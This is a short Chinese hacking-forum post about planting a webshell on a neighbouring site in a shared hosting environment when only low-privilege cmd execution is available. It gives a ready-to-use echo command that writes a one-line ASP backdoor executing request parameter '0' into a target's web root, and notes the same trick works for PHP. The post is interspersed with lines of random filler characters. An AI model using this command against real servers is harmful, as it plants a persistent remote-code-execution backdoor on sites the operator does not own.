中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
8 Y/ V$ Z) b* @5 ]5 g8 D
: ?0 m9 O m `. ?* ?
命令格式
0 I5 }- W( F( b& H: R; p
9 O" e+ }. m- q. D W
Echo 语句 >目标站绝对目录
/ N6 |9 L6 T) s+ ]- Q" `* m* U! `
& z z7 O& U4 h. d; @. S5 P
例如:
' N3 T9 H: t- ?8 k9 |$ R- r
0 G1 ~; G5 p7 K7 U
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
' O" h8 h+ [ A+ {# e3 R
9 m5 o& O$ S5 L. U
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
, s# G( ^8 o; o) D' z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2